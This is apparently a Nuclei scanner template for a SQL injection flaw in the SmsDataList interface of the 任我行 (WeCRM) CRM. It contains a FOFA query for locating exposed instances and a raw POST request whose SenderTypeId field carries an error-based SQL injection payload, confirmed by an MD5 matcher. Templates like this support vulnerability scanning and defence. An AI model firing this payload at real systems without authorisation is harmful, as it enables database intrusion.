id: wecrm-crm-sql-SmsDataList

info:
  name: wecrm-crm-sql-SmsDataList
  author: p1z
  severity: high
  description: |
    任我行crm SmsDataList 接口sql注入漏洞
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/132266804
  metadata:
    fofa-query: app="任我行-CRM"
    hunter-query: 
    verified: true
  tags: 2023,wecrm,crm,sql


requests:
  - raw:
      - |
        POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI

    matchers:
      - type: word
        part: body
        words:
          - 'e10adc3949ba59abbe56e057f20f883e'